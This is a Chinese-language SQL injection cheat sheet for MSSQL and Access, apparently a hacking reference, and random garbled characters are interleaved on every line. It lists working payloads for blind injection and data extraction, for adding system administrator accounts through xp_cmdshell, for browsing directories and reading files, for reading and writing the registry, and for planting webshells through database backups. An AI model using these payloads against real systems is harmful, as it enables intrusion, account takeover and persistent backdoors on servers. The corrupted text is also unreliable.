1.判断是否有注入;and 1=1 ;and 1=2 )~q�@2�^��
2.初步判断是否是mssql ;and user>0 R�@=�Bk(�h
k�fF.Ctr1a
3.注入参数是字符'and [查询条件] and ''=' �t^h�{D� �
�rP�V\� F
4.搜索时没过滤参数的'and [查询条件] and '%25'=' P�g3O )�D9
v3(�W4��G`
5.判断数据库系统 b��g\~�"�
*o�8��Df�Z
;and (select count(*) from sysobjects)>0 mssql 6Xjr0�C�+�
Nz�+Jf57t�
;and (select count(*) from msysobjects)>0 access ���I(��"J$
.\�0�P�yV(
LoHL}1B�G-
�`>@�n6�>f
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Pv.z~~l��Y
��$u"t/_%
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 =sG9]�a<�I
]M|Iy~
X��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 +jcg[|-'�/
�,+0���>�p
9.(1)猜字段的ascii值(access) �9JHu{r"�M
�6�?U2E�t
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ;�c5Q"��
*KP�
�60�T
(2)猜字段的ascii值(mssql) 9aw- �n*�<
~��]71(u�2
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 o=`F�GowF�
W
�s!N%�%g
10.测试权限结构(mssql) %J06]F�G�7
g�i;#?gps�
~eH+*U|\|M
\lVX�~r�4�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �I!y[7��^R
�}.<%46_Z-
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �]KMO�Le6(
��hSmu"a,S
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- _"8\�k�7S*
56�Q9RU(�M
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- p��q`Bg`c�
�JF�x=X=�C
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- NGHzifaE �
�(,<�ti�):
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- J�[:3H6�%`
Gc)
Zu`67
;and 1=(select IS_MEMBER('db_owner'));-- d��jVE x�}
M2ig i��R�
i"uAT$x��e
�!$'s?r�nh
11.添加mssql和系统的帐户 j|�f$�:j
�fD�m�GgD?
;exec master.dbo.sp_addlogin username;-- %(�`4wo},�
;exec master.dbo.sp_password null,username,password;-- RH�o|&.B;+
ZbJUOa?W�F
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- N
3)�OH6w"
pA9:1*�+;;
;exec master.dbo.xp_cmdshell 'net user username password |q?I(b4�Q@
i)V-q9��\�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Pg���Z~of&
U!sv6=�(y@
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 1]�r+�$�L3
i�rNG�URLm
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- !m�"�(SJn"
�Za{�sT&(|
��,4��ftQJ
%�=J<W�A6\
12.(1)遍历目录 4�a�;8XAl
+%%�FT#ce�
;create table dirs(paths varchar(100), id int) NQ$tQ�#chd
�/IM5#M5�~
;insert dirs exec master.dbo.xp_dirtree 'c:\' sa8Sy&��X"
�24 S,w>j�
;and (select top 1 paths from dirs)>0 t@-:e^�� v
v~:$]a���8
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 3\6��U�H�
T!o 4k���
�rm*Jo|eH`
6N
>ksqo8%
(2)遍历目录 mqGp]��'�{
x\�j�6=��|
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- .IYE�+X�zV
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 S2)rkX�$��
,,r%Y&:�`6
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 -b-P�vw4��
)2mi6[qs0l
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 v7VJVLH,I7
#;'1a��T�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 /ve8);cH�\
�H"8+[.xBh
kStWsc$;+T
�B[��F,�D�
13.mssql中的存储过程 x,"'\=|�s*
2s,�wC!',�
xp_regenumvalues 注册表根键, 子键 >S�5:zz�\�
,L�&Ka|N0�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �8Pklw^k��
�RRy3N
)HR
xp_regread 根键,子键,键值名 �Fs�7�/�3
>G�<AyS&z*
;exec xp_regread zH8l-0I�+$
Y3jb�'S�4(
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 DUiqt09`~�
fL4F
~@`9l
xp_regwrite 根键,子键, 值名, 值类型, 值 =8 d`�qS�"
):��C4"2l3
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �}' �`2C$�
�A(#h�yb#�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 .H+`]�qLkL
6/9 A'�!4C
xp_regdeletevalue 根键,子键,值名 0Ha1p��q�R
4f�~h�d-�z
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Zk2�-U"0\o
�( B$;'U<
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 XiI@Px?FL�
�p�L��L
^R
Dq+�rEt��
67� �>*�AL
14.mssql的backup创建webshell �
L�'s_lC�
�C�^�RO@kM
use model $�(�_Xt-�6
Bu�I&kU,WY
create table cmd(str image); �rWF~�a�ec
>L?)�f3�_a
insert into cmd(str) values (''); :�h1�it��n
E��,5��j�Y
backup database model to disk='c:\l.asp'; X�"�"<5s'0
.Vq-�<�c�%
�%��"@KuqV
$xmlt�v�aF
15.mssql内置函数 &ZF�sK �c#
n@w$�5y1@�
;and (select @@version)>0 获得Windows的版本号 =kohQ d.�n
xt�N%v�0ZZ
;and user_name()='dbo' 判断当前系统的连接用户是不是sa +2`Rv��Q�N
0Ep%&>��@�
;and (select user_name())>0 爆当前系统的连接用户 l"!.aI�Y"e
yef@V�2�Z+
;and (select db_name())>0 得到当前连接的数据库 �VN|P(�S6�
�"y/GK1C��
y�Wu80C8�q
�,6�,#�Lc�
16.简洁的webshell 6Km@A� M�]
X:+;d8rC�y
use model SZ�H,��I&8
�d�NG>�:p�
create table cmd(str image); Z<z(;)?�c�
Uce�ZW�tYa
insert into cmd(str) values (''); XX~�~�SvSM
L�m"l*j�4
backup database model to disk='g:\wwwtest\l.asp';
